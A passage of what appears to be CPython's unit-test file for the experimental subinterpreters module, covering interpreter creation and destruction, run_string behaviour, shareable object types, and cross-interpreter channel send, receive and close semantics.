except interpreters.ChannelClosedError:
pass
else:
assert False, 'channel not closed'
class ChannelAction(namedtuple('ChannelAction', 'action end interp')):
def __new__(cls, action, end=None, interp=None):
if not end:
end = 'both'
if not interp:
interp = 'main'
self = super().__new__(cls, action, end, interp)
return self
def __init__(self, *args, **kwargs):
if self.action == 'use':
if self.end not in ('same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
elif self.action in ('close', 'force-close'):
if self.end not in ('both', 'same', 'opposite', 'send', 'recv'):
raise ValueError(self.end)
else:
raise ValueError(self.action)
if self.interp not in ('main', 'same', 'other', 'extra'):
raise ValueError(self.interp)
def resolve_end(self, end):
if self.end == 'same':
return end
elif self.end == 'opposite':
return 'recv' if end == 'send' else 'send'
else:
return self.end
def resolve_interp(self, interp, other, extra):
if self.interp == 'same':
return interp
elif self.interp == 'other':
if other is None:
raise RuntimeError
return other
elif self.interp == 'extra':
if extra is None:
raise RuntimeError
return extra
elif self.interp == 'main':
if interp.name == 'main':
return interp
elif other and other.name == 'main':
return other
else:
raise RuntimeError
# Per __init__(), there aren't any others.
class ChannelState(namedtuple('ChannelState', 'pending closed')):
def __new__(cls, pending=0, *, closed=False):
self = super().__new__(cls, pending, closed)
return self
def incr(self):
return type(self)(self.pending + 1, closed=self.closed)
def decr(self):
return type(self)(self.pending - 1, closed=self.closed)
def close(self, *, force=True):
if self.closed:
if not force or self.pending == 0:
return self
return type(self)(0 if force else self.pending, closed=True)
def run_action(cid, action, end, state, *, hideclosed=True):
if state.closed:
if action == 'use' and end == 'recv' and state.pending:
expectfail = False
else:
expectfail = True
else:
expectfail = False
try:
result = _run_action(cid, action, end, state)
except interpreters.ChannelClosedError:
if not hideclosed and not expectfail:
raise
result = state.close()
else:
if expectfail:
raise ... # XXX
return result
def _run_action(cid, action, end, state):
if action == 'use':
if end == 'send':
interpreters.channel_send(cid, b'spam')
return state.incr()
elif end == 'recv':
if not state.pending:
try:
interpreters.channel_recv(cid)
except interpreters.ChannelEmptyError:
return state
else:
raise Exception('expected ChannelEmptyError')
else:
interpreters.channel_recv(cid)
return state.decr()
else:
raise ValueError(end)
elif action == 'close':
kwargs = {}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close()
elif action == 'force-close':
kwargs = {
'force': True,
}
if end in ('recv', 'send'):
kwargs[end] = True
interpreters.channel_close(cid, **kwargs)
return state.close(force=True)
else:
raise ValueError(action)
def clean_up_interpreters():
for id in interpreters.list_all():
if id == 0: # main
continue
try:
interpreters.destroy(id)
except RuntimeError:
pass # already destroyed
def clean_up_channels():
for cid in interpreters.channel_list_all():
try:
interpreters.channel_destroy(cid)
except interpreters.ChannelNotFoundError:
pass # already destroyed
class TestBase(unittest.TestCase):
def tearDown(self):
clean_up_interpreters()
clean_up_channels()
##################################
# misc. tests
class IsShareableTests(unittest.TestCase):
def test_default_shareables(self):
shareables = [
# singletons
None,
# builtin objects
b'spam',
'spam',
10,
-10,
]
for obj in shareables:
with self.subTest(obj):
self.assertTrue(
interpreters.is_shareable(obj))
def test_not_shareable(self):
class Cheese:
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class SubBytes(bytes):
"""A subclass of a shareable type."""
not_shareables = [
# singletons
True,
False,
NotImplemented,
...,
# builtin types and objects
type,
object,
object(),
Exception(),
100.0,
# user-defined types and objects
Cheese,
Cheese('Wensleydale'),
SubBytes(b'spam'),
]
for obj in not_shareables:
with self.subTest(repr(obj)):
self.assertFalse(
interpreters.is_shareable(obj))
class ShareableTypeTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.cid = interpreters.channel_create()
def tearDown(self):
interpreters.channel_destroy(self.cid)
super().tearDown()
def _assert_values(self, values):
for obj in values:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
self.assertEqual(got, obj)
self.assertIs(type(got), type(obj))
# XXX Check the following in the channel tests?
#self.assertIsNot(got, obj)
def test_singletons(self):
for obj in [None]:
with self.subTest(obj):
interpreters.channel_send(self.cid, obj)
got = interpreters.channel_recv(self.cid)
# XXX What about between interpreters?
self.assertIs(got, obj)
def test_types(self):
self._assert_values([
b'spam',
9999,
self.cid,
])
def test_bytes(self):
self._assert_values(i.to_bytes(2, 'little', signed=True)
for i in range(-1, 258))
def test_int(self):
self._assert_values(itertools.chain(range(-1, 258),
[sys.maxsize, -sys.maxsize - 1]))
def test_non_shareable_int(self):
ints = [
sys.maxsize + 1,
-sys.maxsize - 2,
2**1000,
]
for i in ints:
with self.subTest(i):
with self.assertRaises(OverflowError):
interpreters.channel_send(self.cid, i)
##################################
# interpreter tests
class ListAllTests(TestBase):
def test_initial(self):
main = interpreters.get_main()
ids = interpreters.list_all()
self.assertEqual(ids, [main])
def test_after_creating(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
ids = interpreters.list_all()
self.assertEqual(ids, [main, first, second])
def test_after_destroying(self):
main = interpreters.get_main()
first = interpreters.create()
second = interpreters.create()
interpreters.destroy(first)
ids = interpreters.list_all()
self.assertEqual(ids, [main, second])
class GetCurrentTests(TestBase):
def test_main(self):
main = interpreters.get_main()
cur = interpreters.get_current()
self.assertEqual(cur, main)
self.assertIsInstance(cur, interpreters.InterpreterID)
def test_subinterpreter(self):
main = interpreters.get_main()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
cur = _interpreters.get_current()
print(cur)
assert isinstance(cur, _interpreters.InterpreterID)
"""))
cur = int(out.strip())
_, expected = interpreters.list_all()
self.assertEqual(cur, expected)
self.assertNotEqual(cur, main)
class GetMainTests(TestBase):
def test_from_main(self):
[expected] = interpreters.list_all()
main = interpreters.get_main()
self.assertEqual(main, expected)
self.assertIsInstance(main, interpreters.InterpreterID)
def test_from_subinterpreter(self):
[expected] = interpreters.list_all()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
main = _interpreters.get_main()
print(main)
assert isinstance(main, _interpreters.InterpreterID)
"""))
main = int(out.strip())
self.assertEqual(main, expected)
class IsRunningTests(TestBase):
def test_main(self):
main = interpreters.get_main()
self.assertTrue(interpreters.is_running(main))
def test_subinterpreter(self):
interp = interpreters.create()
self.assertFalse(interpreters.is_running(interp))
with _running(interp):
self.assertTrue(interpreters.is_running(interp))
self.assertFalse(interpreters.is_running(interp))
def test_from_subinterpreter(self):
interp = interpreters.create()
out = _run_output(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
if _interpreters.is_running({interp}):
print(True)
else:
print(False)
"""))
self.assertEqual(out.strip(), 'True')
def test_already_destroyed(self):
interp = interpreters.create()
interpreters.destroy(interp)
with self.assertRaises(RuntimeError):
interpreters.is_running(interp)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.is_running(1_000_000)
def test_bad_id(self):
with self.assertRaises(RuntimeError):
interpreters.is_running(-1)
class InterpreterIDTests(TestBase):
def test_with_int(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(int(id), 10)
def test_coerce_id(self):
id = interpreters.InterpreterID('10', force=True)
self.assertEqual(int(id), 10)
id = interpreters.InterpreterID(10.0, force=True)
self.assertEqual(int(id), 10)
class Int(str):
def __init__(self, value):
self._value = value
def __int__(self):
return self._value
id = interpreters.InterpreterID(Int(10), force=True)
self.assertEqual(int(id), 10)
def test_bad_id(self):
for id in [-1, 'spam']:
with self.subTest(id):
with self.assertRaises(ValueError):
interpreters.InterpreterID(id)
with self.assertRaises(OverflowError):
interpreters.InterpreterID(2**64)
with self.assertRaises(TypeError):
interpreters.InterpreterID(object())
def test_does_not_exist(self):
id = interpreters.channel_create()
with self.assertRaises(RuntimeError):
interpreters.InterpreterID(int(id) + 1) # unforced
def test_str(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(str(id), '10')
def test_repr(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(repr(id), 'InterpreterID(10)')
def test_equality(self):
id1 = interpreters.create()
id2 = interpreters.InterpreterID(int(id1))
id3 = interpreters.create()
self.assertTrue(id1 == id1)
self.assertTrue(id1 == id2)
self.assertTrue(id1 == int(id1))
self.assertFalse(id1 == id3)
self.assertFalse(id1 != id1)
self.assertFalse(id1 != id2)
self.assertTrue(id1 != id3)
class CreateTests(TestBase):
def test_in_main(self):
id = interpreters.create()
self.assertIsInstance(id, interpreters.InterpreterID)
self.assertIn(id, interpreters.list_all())
@unittest.skip('enable this test when working on pystate.c')
def test_unique_id(self):
seen = set()
for _ in range(100):
id = interpreters.create()
interpreters.destroy(id)
seen.add(id)
self.assertEqual(len(seen), 100)
def test_in_thread(self):
lock = threading.Lock()
id = None
def f():
nonlocal id
id = interpreters.create()
lock.acquire()
lock.release()
t = threading.Thread(target=f)
with lock:
t.start()
t.join()
self.assertIn(id, interpreters.list_all())
def test_in_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
assert isinstance(id, _interpreters.InterpreterID)
"""))
id2 = int(out.strip())
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_in_threaded_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = None
def f():
nonlocal id2
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
"""))
id2 = int(out.strip())
t = threading.Thread(target=f)
t.start()
t.join()
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_after_destroy_all(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
ids = []
for _ in range(3):
id = interpreters.create()
ids.append(id)
# Now destroy them.
for id in ids:
interpreters.destroy(id)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id})
def test_after_destroy_some(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
# Now destroy 2 of them.
interpreters.destroy(id1)
interpreters.destroy(id3)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id, id2})
class DestroyTests(TestBase):
def test_one(self):
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
self.assertIn(id2, interpreters.list_all())
interpreters.destroy(id2)
self.assertNotIn(id2, interpreters.list_all())
self.assertIn(id1, interpreters.list_all())
self.assertIn(id3, interpreters.list_all())
def test_all(self):
before = set(interpreters.list_all())
ids = set()
for _ in range(3):
id = interpreters.create()
ids.add(id)
self.assertEqual(set(interpreters.list_all()), before | ids)
for id in ids:
interpreters.destroy(id)
self.assertEqual(set(interpreters.list_all()), before)
def test_main(self):
main, = interpreters.list_all()
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
def f():
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
t = threading.Thread(target=f)
t.start()
t.join()
def test_already_destroyed(self):
id = interpreters.create()
interpreters.destroy(id)
with self.assertRaises(RuntimeError):
interpreters.destroy(id)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.destroy(1_000_000)
def test_bad_id(self):
with self.assertRaises(RuntimeError):
interpreters.destroy(-1)
def test_from_current(self):
main, = interpreters.list_all()
id = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
try:
_interpreters.destroy({id})
except RuntimeError:
pass
""")
interpreters.run_string(id, script)
self.assertEqual(set(interpreters.list_all()), {main, id})
def test_from_sibling(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.destroy({id2})
""")
interpreters.run_string(id1, script)
self.assertEqual(set(interpreters.list_all()), {main, id1})
def test_from_other_thread(self):
id = interpreters.create()
def f():
interpreters.destroy(id)
t = threading.Thread(target=f)
t.start()
t.join()
def test_still_running(self):
main, = interpreters.list_all()
interp = interpreters.create()
with _running(interp):
with self.assertRaises(RuntimeError):
interpreters.destroy(interp)
self.assertTrue(interpreters.is_running(interp))
class RunStringTests(TestBase):
SCRIPT = dedent("""
with open('{}', 'w') as out:
out.write('{}')
""")
FILENAME = 'spam'
def setUp(self):
super().setUp()
self.id = interpreters.create()
self._fs = None
def tearDown(self):
if self._fs is not None:
self._fs.close()
super().tearDown()
@property
def fs(self):
if self._fs is None:
self._fs = FSFixture(self)
return self._fs
def test_success(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
interpreters.run_string(self.id, script)
out = file.read()
self.assertEqual(out, 'it worked!')
def test_in_thread(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
def f():
interpreters.run_string(self.id, script)
t = threading.Thread(target=f)
t.start()
t.join()
out = file.read()
self.assertEqual(out, 'it worked!')
def test_create_thread(self):
script, file = _captured_script("""
import threading
def f():
print('it worked!', end='')
t = threading.Thread(target=f)
t.start()
t.join()
""")
with file:
interpreters.run_string(self.id, script)
out = file.read()
self.assertEqual(out, 'it worked!')
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
def test_fork(self):
import tempfile
with tempfile.NamedTemporaryFile('w+') as file:
file.write('')
file.flush()
expected = 'spam spam spam spam spam'
script = dedent(f"""
import os
try:
os.fork()
except RuntimeError:
with open('{file.name}', 'w') as out:
out.write('{expected}')
""")
interpreters.run_string(self.id, script)
file.seek(0)
content = file.read()
self.assertEqual(content, expected)
def test_already_running(self):
with _running(self.id):
with self.assertRaises(RuntimeError):
interpreters.run_string(self.id, 'print("spam")')
def test_does_not_exist(self):
id = 0
while id in interpreters.list_all():
id += 1
with self.assertRaises(RuntimeError):
interpreters.run_string(id, 'print("spam")')
def test_error_id(self):
with self.assertRaises(RuntimeError):
interpreters.run_string(-1, 'print("spam")')
def test_bad_id(self):
with self.assertRaises(TypeError):
interpreters.run_string('spam', 'print("spam")')
def test_bad_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, 10)
def test_bytes_for_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, b'print("spam")')
@contextlib.contextmanager
def assert_run_failed(self, exctype, msg=None):
with self.assertRaises(interpreters.RunFailedError) as caught:
yield
if msg is None:
self.assertEqual(str(caught.exception).split(':')[0],
str(exctype))
else:
self.assertEqual(str(caught.exception),
"{}: {}".format(exctype, msg))
def test_invalid_syntax(self):
with self.assert_run_failed(SyntaxError):
# missing close paren
interpreters.run_string(self.id, 'print("spam"')
def test_failure(self):
with self.assert_run_failed(Exception, 'spam'):
interpreters.run_string(self.id, 'raise Exception("spam")')
def test_SystemExit(self):
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, 'raise SystemExit(42)')
def test_sys_exit(self):
with self.assert_run_failed(SystemExit):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit()
"""))
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit(42)
"""))
def test_with_shared(self):
r, w = os.pipe()
shared = {
'spam': b'ham',
'eggs': b'-1',
'cheddar': None,
}
script = dedent(f"""
eggs = int(eggs)
spam = 42
result = spam + eggs
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['spam'], 42)
self.assertEqual(ns['eggs'], -1)
self.assertEqual(ns['result'], 41)
self.assertIsNone(ns['cheddar'])
def test_shared_overwrites(self):
interpreters.run_string(self.id, dedent("""
spam = 'eggs'
ns1 = dict(vars())
del ns1['__builtins__']
"""))
shared = {'spam': b'ham'}
script = dedent(f"""
ns2 = dict(vars())
del ns2['__builtins__']
""")
interpreters.run_string(self.id, script, shared)
r, w = os.pipe()
script = dedent(f"""
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['ns1']['spam'], 'eggs')
self.assertEqual(ns['ns2']['spam'], b'ham')
self.assertEqual(ns['spam'], b'ham')
def test_shared_overwrites_default_vars(self):
r, w = os.pipe()
shared = {'__name__': b'not __main__'}
script = dedent(f"""
spam = 42
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['__name__'], b'not __main__')
def test_main_reused(self):
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
spam = True
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
del ns, pickle, chan
"""))
with open(r, 'rb') as chan:
ns1 = pickle.load(chan)
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
eggs = False
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
"""))
with open(r, 'rb') as chan:
ns2 = pickle.load(chan)
self.assertIn('spam', ns1)
self.assertNotIn('eggs', ns1)
self.assertIn('eggs', ns2)
self.assertIn('spam', ns2)
def test_execution_namespace_is_main(self):
r, w = os.pipe()
script = dedent(f"""
spam = 42
ns = dict(vars())
ns['__builtins__'] = str(ns['__builtins__'])
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
ns.pop('__builtins__')
ns.pop('__loader__')
self.assertEqual(ns, {
'__name__': '__main__',
'__annotations__': {},
'__doc__': None,
'__package__': None,
'__spec__': None,
'spam': 42,
})
# XXX Fix this test!
@unittest.skip('blocking forever')
def test_still_running_at_exit(self):
script = dedent(f"""
from textwrap import dedent
import threading
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
def f():
_interpreters.run_string(id, dedent('''
import time
# Give plenty of time for the main interpreter to finish.
time.sleep(1_000_000)
'''))
t = threading.Thread(target=f)
t.start()
""")
with support.temp_dir() as dirname:
filename = script_helper.make_script(dirname, 'interp', script)
with script_helper.spawn_python(filename) as proc:
retcode = proc.wait()
self.assertEqual(retcode, 0)
##################################
# channel tests
class ChannelIDTests(TestBase):
def test_default_kwargs(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(int(cid), 10)
self.assertEqual(cid.end, 'both')
def test_with_kwargs(self):
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, send=True, recv=False, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, recv=True, send=False, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(cid.end, 'both')
def test_coerce_id(self):
cid = interpreters._channel_id('10', force=True)
self.assertEqual(int(cid), 10)
cid = interpreters._channel_id(10.0, force=True)
self.assertEqual(int(cid), 10)
class Int(str):
def __init__(self, value):
self._value = value
def __int__(self):
return self._value
cid = interpreters._channel_id(Int(10), force=True)
self.assertEqual(int(cid), 10)
def test_bad_id(self):
for cid in [-1, 'spam']:
with self.subTest(cid):
with self.assertRaises(ValueError):
interpreters._channel_id(cid)
with self.assertRaises(OverflowError):
interpreters._channel_id(2**64)
with self.assertRaises(TypeError):
interpreters._channel_id(object())
def test_bad_kwargs(self):
with self.assertRaises(ValueError):
interpreters._channel_id(10, send=False, recv=False)
def test_does_not_exist(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters._channel_id(int(cid) + 1) # unforced
def test_str(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(str(cid), '10')
def test_repr(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, send=True)')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, recv=True)')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
def test_equality(self):
cid1 = interpreters.channel_create()
cid2 = interpreters._channel_id(int(cid1))
cid3 = interpreters.channel_create()
self.assertTrue(cid1 == cid1)
self.assertTrue(cid1 == cid2)
self.assertTrue(cid1 == int(cid1))
self.assertFalse(cid1 == cid3)
self.assertFalse(cid1 != cid1)
self.assertFalse(cid1 != cid2)
self.assertTrue(cid1 != cid3)
class ChannelTests(TestBase):
def test_create_cid(self):
cid = interpreters.channel_create()
self.assertIsInstance(cid, interpreters.ChannelID)
def test_sequential_ids(self):
before = interpreters.channel_list_all()
id1 = interpreters.channel_create()
id2 = interpreters.channel_create()
id3 = interpreters.channel_create()
after = interpreters.channel_list_all()
self.assertEqual(id2, int(id1) + 1)
self.assertEqual(id3, int(id2) + 1)
self.assertEqual(set(after) - set(before), {id1, id2, id3})
def test_ids_global(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid1 = int(out.strip())
id2 = interpreters.create()
out = _run_output(id2, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid2 = int(out.strip())
self.assertEqual(cid2, int(cid1) + 1)
####################
def test_send_recv_main(self):
cid = interpreters.channel_create()
orig = b'spam'
interpreters.channel_send(cid, orig)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, orig)
self.assertIsNot(obj, orig)
def test_send_recv_same_interpreter(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
orig = b'spam'
_interpreters.channel_send(cid, orig)
obj = _interpreters.channel_recv(cid)
assert obj is not orig
assert obj == orig
"""))
def test_send_recv_different_interpreters(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = _run_output(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_send_recv_different_threads(self):
cid = interpreters.channel_create()
def f():
while True:
try:
obj = interpreters.channel_recv(cid)
break
except interpreters.ChannelEmptyError:
time.sleep(0.1)
interpreters.channel_send(cid, obj)
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_send_recv_different_interpreters_and_threads(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = None
def f():
nonlocal out
out = _run_output(id1, dedent(f"""
import time
import _xxsubinterpreters as _interpreters
while True:
try:
obj = _interpreters.channel_recv({cid})
break
except _interpreters.ChannelEmptyError:
time.sleep(0.1)
assert(obj == b'spam')
_interpreters.channel_send({cid}, b'eggs')
"""))
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'eggs')
def test_send_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_send(10, b'spam')
def test_recv_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_recv(10)
def test_recv_empty(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelEmptyError):
interpreters.channel_recv(cid)
def test_run_string_arg_unresolved(self):
cid = interpreters.channel_create()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(cid.end)
_interpreters.channel_send(cid, b'spam')
"""),
dict(cid=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# XXX For now there is no high-level channel into which the
# sent channel ID can be converted...
# Note: this test caused crashes on some buildbots (bpo-33615).
@unittest.skip('disabled until high-level channels exist')
def test_run_string_arg_resolved(self):
cid = interpreters.channel_create()
cid = interpreters._channel_id(cid, _resolve=True)
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(chan.id.end)
_interpreters.channel_send(chan.id, b'spam')
"""),
dict(chan=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# close
def test_close_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
interpreters.run_string(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_recv({cid})
"""))
interpreters.channel_close(cid)
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id2, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
def test_close_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_empty(self):
tests = [
(False, False),
(True, False),
(False, True),
(True, True),
]
for send, recv in tests:
with self.subTest((send, recv)):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, send=send, recv=recv)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_defaults_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
def test_close_recv_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_send_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True, send=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_recv_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_send_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_close({cid}, force=True)
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
